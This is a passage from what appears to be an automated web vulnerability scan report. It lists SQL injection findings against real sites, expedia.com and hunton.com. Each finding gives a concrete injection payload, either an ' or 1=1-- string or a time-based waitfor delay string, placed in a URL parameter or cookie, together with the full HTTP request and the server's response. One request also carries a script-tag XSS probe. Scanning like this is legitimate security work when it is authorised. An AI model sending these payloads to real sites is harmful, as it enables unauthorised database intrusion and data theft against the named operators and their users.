Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 76383

<!-- srvpush1 15:39:25(:293) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR43]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type numeric to tinyint.">
...[SNIP]...

2.39. http://www.expedia.com/pub/agent.dll [rgst parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The rgst parameter appears to be vulnerable to SQL injection attacks. The payload 12520755%20or%201%3d1--%20 was submitted in the rgst parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=112520755%20or%201%3d1--%20&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:39:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01CA76DEA0$F4$B5202000A$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$C1$25$EEzK$21l$5F$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77852

<!-- srvpush1 15:39:01(:987) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR32]: 37000 (8114): [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type int to tinyint.">
...[SNIP]...

2.40. http://www.expedia.com/pubspec/scripts/eap.asp [TripLength parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /pubspec/scripts/eap.asp

Issue detail

The TripLength parameter appears to be vulnerable to SQL injection attacks. The payload 11976288'%20or%201%3d1--%20 was submitted in the TripLength parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pubspec/scripts/eap.asp?GOTO=FLEXFLTSEARCH&Load=1&FrAirport=AUS&ToAirport=DTW&Month=5/1/2011&TripLength=0,1,1011976288'%20or%201%3d1--%20&NumAdult=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:38:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01EA6AFBE3$F4$B5202000$5E$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$1B$81$B1$2Bb$A0$C7K$82$AB$89$FB!e02000`133; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819499`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 77907

<!-- srvpush1 15:38:49(:042) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<COMMENT ID=ERROR_TEXT TITLE="[MR09]: 37000 (200110): [Microsoft][ODBC SQL Server Driver][SQL Server]SP: FareCacheFareGetDepartureDateR. Parameter is invalid. Parameter: NightStayNbrMax; value: 0.">
...[SNIP]...

2.41. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [CurrentZone cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The CurrentZone cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the CurrentZone cookie. The application took 52577 milliseconds to respond to the request, compared with 13344 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742445101.846&lc=http%3A%2F%2Fwww.hunton.com%2Fprofessionals%2FuniGC.aspx%3FxpST%3DProfessionalSearch&rf=http%3A%2F%2Fwww.hunton.com%2Faboutus%2FuniGC.aspx%3FxpST%3DAboutUs&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=Professionals%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw')waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.4.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1846; PortletId=5983402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 01:31:45 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.42. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The js parameter appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the js parameter. The application took 36962 milliseconds to respond to the request, compared with 170 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1',0)waitfor%20delay'0%3a0%3a20'--&ts=1304742418094.778&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch&rf=http%3A%2F%2Fwww.hunton.com%2F&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363; sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; DefaultCulture=en-US; Mode=1; EventingStatus=1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; NavId=1857; PortletId=5994402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 23:51:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.43. http://www.hunton.com/FCWSite/Img/ntpagetag/ntpagetag.gif [jv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /FCWSite/Img/ntpagetag/ntpagetag.gif

Issue detail

The jv parameter appears to be vulnerable to SQL injection attacks. The payload ,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the jv parameter. The application took 29078 milliseconds to respond to the request, compared with 349 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /FCWSite/Img/ntpagetag/ntpagetag.gif?js=1&ts=1304742738624.440&lc=http%3A%2F%2Fwww.hunton.com%2Fnews%2FuniGC.aspx%3FxpST%3DPENSearch%26nsextt%3D%2527%253E%253Cscript%253Enetsparker(9)%253C%2Fscript%253E&rs=1920x1200&cd=16&ln=en&tz=GMT%20-05%3A00&jv=1,0)waitfor%20delay'0%3a0%3a20'--&h1content=Webpage&h1lang=English%20(United%20States)&h1pagetitle=News%20%26%20Events%20%7C%20Hunton%20%26%20Williams%20LLP&h1subcontent=None&h1websection=news HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch&nsextt=%27%3E%3Cscript%3Enetsparker(9)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1849; PortletId=5986402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 404 Not Found
Date: Sat, 07 May 2011 00:53:50 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

2.44. http://www.hunton.com/aboutus/uniGC.aspx [EventingStatus cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 60845 milliseconds to respond to the request, compared with 28128 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1waitfor%20delay'0%3a0%3a20'--; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:33:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.45. http://www.hunton.com/professionals/uniGC.aspx [EventingStatus cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The EventingStatus cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the EventingStatus cookie. The application took 39995 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1',0,0)waitfor%20delay'0%3a0%3a20'--; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:30:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=3dc8e81d-f541-4b27-b4dc-f2ceacc23a78; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.46. http://www.hunton.com/professionals/uniGC.aspx [ZoneId cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The ZoneId cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the ZoneId cookie. The application took 33219 milliseconds to respond to the request, compared with 2810 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalSearch HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1838; PortletId=5975402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=7',0)waitfor%20delay'0%3a0%3a20'--; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.1.10.1304742363

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:27:28 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=6d620d41-9034-454a-8d58-923aa7816ed0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2.47. http://www.hunton.com/professionals/uniGC.aspx [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie. The application took 63956 milliseconds to respond to the request, compared with 9107 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
